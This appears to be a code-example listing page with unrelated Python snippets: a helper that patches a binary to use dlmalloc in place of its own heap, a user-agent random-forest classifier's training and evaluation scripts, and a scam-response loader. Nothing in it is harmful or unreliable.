"""
Replace a custom heap with dlmalloc

Usage:
  from util import heap

  heap.declare(pt.linker)

  pt.patch(addr, sym='dlmalloc')
  pt.patch(addr, sym='dlcalloc')
  pt.patch(addr, sym='dlfree')
  pt.patch(addr, sym='dlrealloc')
"""

__all__ = ["apply"]

dlmalloc = {'symbols': {
    'dlmalloc': 'void *dlmalloc(size_t size)',
    'dlfree': 'void dlfree(void *addr)',
    'dlcalloc': 'void *dlcalloc(size_t count, size_t size)',
    'dlrealloc': 'void *dlrealloc(void *addr, size_t size)',
}, 'source': read('heap/malloc.c')}

def declare(linker):
    if not 'dlmalloc' in linker:
        linker.declare(**dlmalloc)
Esempio n. 46
0
    y = np.array([s[1] for s in samples])

    clf = RandomForestClassifier(n_estimators=30)

    if args["-c"]:
        logger.debug("Performing N-fold cross-validation (N=%s)" % args["-f"])
        scores = cross_validation.cross_val_score(
            clf, X.toarray(), y, n_jobs=int(args["-j"]), cv=int(args["-f"]), scoring=args["-s"]
        )
        print("F1: %0.4f (+/- %0.4f)" % (scores.mean(), scores.std() * 2))

    logger.debug("Training model on all data")
    clf.fit(X.toarray(), y)

    logger.debug("Done, returning model and vocabulary")

    return (clf, vocabulary)


if __name__ == "__main__":
    # Write pickled classifier to stdout.

    import cPickle as pickle
    import sys

    logging.basicConfig(level=logging.DEBUG)

    samples, vocabulary = util.read(args["<DATABASE>"])

    pickle.dump(train(samples, vocabulary), open(args["-o"], "wb"))
Esempio n. 47
0
    X = extract_features(ua, vocabulary)
    pred = clf.predict(X.toarray())

    return X, pred


if __name__ == "__main__":
    import cPickle as pickle
    import sys

    clf, vocabulary = pickle.load(open(args["<MODEL>"], "rb"))

    if len(sys.argv) != 3:
        print >> sys.stderr, "Usage: %s clf input_file" % sys.argv[0]
        sys.exit(1)

    count = 0
    correct = 0
    samples, _ = util.read(args["<DATABASE>"])
    for ua, label in samples:
        X, Y_pred = predict(clf, ua, vocabulary)
        count += 1
        if label == Y_pred:
            correct += 1
        else:
            print ua, label, Y_pred[0]
            print X
            print

    print "Total: %d, Correct: %d, Ratio: %.2f" % (count, correct, (1.0 * correct / count))
Esempio n. 48
0
File: data.py Progetto: jamii/scampy
def load_responses(scam):
  responses = read(('scams/%s/responses' % scam)).split('###')
  responses = [response.lstrip().rstrip() for response in responses]
  return [response for response in responses if response != ""]